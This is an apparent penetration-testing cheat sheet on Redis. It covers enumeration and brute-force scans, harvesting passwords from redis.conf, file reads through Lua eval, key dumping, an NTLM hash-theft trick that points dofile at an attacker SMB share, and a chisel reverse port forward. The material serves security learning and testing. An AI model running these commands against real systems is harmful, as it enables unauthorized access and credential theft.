Pentest Notes
Pentest Notes

Exploits related to Database

Others

CouchDB Pentesting
InfluxDB Pentesting
MSSQL (Microsoft SQL) Pentesting
MongoDB Pentesting
MySQL Pentesting
Neo4j Pentesting
PostgreSQL Pentesting
Redis Pentesting
SQLite Pentesting

Redis Pentesting

Last modified: 2023-03-26

Database

Redis is the In-Memory NoSQL Database. A default port is 6379.

Enumeration

nmap --script redis-info -p 6379 <target-ip>
nmap --script redis-brute -p 6379 <target-ip>

msf> use auxiliary/scanner/redis/redis_server

Check Config File

If we have access to target system, find the configuration file then we may be able to get passwords.

find / -name "redis.conf" 2>/dev/null
grep -i pass /path/to/redis.conf

If we get the line with password written as below,

requirepass "password"

We can set the password in a redis client.

> auth "password"

Connect

redis-cli -h <target-ip> -p 6379

# with password
redis-cli -h <target-ip> -p 6379 -a password

After connecting and execute the first arbitrary command, we may got the following output.

NOAUTH Authentication required.

If so, we need to authenticate to communicate with the redis server.

> auth <password>
# or
> auth default <password>
# or
> auth <username> <password>

Commands (Non-RESP Format)

Non-RESP (REdis Serialization Protocol) is such like the other protocol's command. Commands are separated with spaces.

# Check credentials
> auth <username> <password>
> auth default <password>

# Set a password temporary until the service restarts.
> config set requirepass <password>

# Information on the Redis server
> info
> info keyspace

# List all
> config get *

# List all databases
> config get databases

# Select the database ('select <index>')
> select 0
> select 1
> select 12

# Read files and directories using Lua scripts
> eval "dofile('C:\\\\Users\\\\Administrator\\\\Desktop\\\\user.txt')" 0
> eval "dofile('C:\\\\Users\\\\<username>\\\\Desktop\\\\user.txt')" 0

Get Key Value

# Find all keys
> keys *

# Get the type of value
> type <key_name>

# type: string
> get <key_name>

# type: hash
> hget <key_name>
> hmget <key_name>
> hgetall <key_name>

# type: lists
> lrange <key_name> <start> <stop>
# e.g.
> lrange "userlist" 0 0
> lrange "userlist" 0 5

# type: sets
> smembers <key_name>

# type: sorted sets
> zrangebyscore <key_name> <min> <max>

# type: stream
> xread count <count> streams <key_name> <id>

Set Key Value

> set <key> <value>
# Hash type
> hset <key> <field> <value>

Commands (RESP Format)

RESP (REdis Serialization Protocol) is The syntax is…

  • *<num> The number of arguments.
  • $<num> The string length of the argument.

Below is the command same as set name "john".

telnet 10.0.0.1 6379
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.

*3
$3
set
$4
name
$4
john

NTLM Hash Disclosure

In local machine, start SMB server.

mkdir share
sudo impacket-smbserver share ./share/ -smb2support

Now execute the following command in Redis client.

> eval "dofile('//10.0.0.1/share')" 0

We might get a NTLM hash in the incoming connection to the SMB server. We can see the SMB server logs in terminal.
If the NTLM hash found, crack it.


Port Forwarding Redis Server to Local Machine

In local machine,

chisel server -p 9001 --reverse

In target machine,

./chisel client <local-ip>:9001 R:6379:127.0.0.1:6379
Twitter GitHub